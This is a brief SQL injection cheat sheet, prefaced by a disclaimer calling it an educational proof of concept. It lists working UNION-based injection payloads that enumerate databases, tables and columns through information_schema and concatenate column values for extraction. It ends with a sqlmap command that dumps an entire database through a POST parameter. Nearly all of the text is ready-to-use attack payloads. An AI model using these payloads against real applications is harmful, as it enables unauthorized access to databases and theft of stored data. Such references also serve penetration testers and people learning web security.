DISCLAIMER
The author is in no way responsible for any illegal use of this software/reference. It is provided purely as an educational proof of concept. I am also not responsible for any damages or mishaps that may happen in the course of using this software/reference. Use at your own risk.
Non Blind SQL injection
Find Databases:
' or 1=1 union SELECT distinct table_schema, table_schema FROM INFORMATION_SCHEMA.tables -- "
Table Names:
' or 1=1 union select table_schema, table_name from information_schema.tables where table_schema = "<Database Name>" -- "
Column Information:
' or 1=1 union select column_name, data_type from information_schema.columns where table_name = "<Table Name>" -- "
Retrieve multiple columns:
' or 1=1 union select concat(<Column1>, 0x0a, <Column2>, 0x0a, <Column3>) from <Table Name> -- "
SQLMap
Post Request:
sqlmap -u <URL> -dump-all -data <postparam>=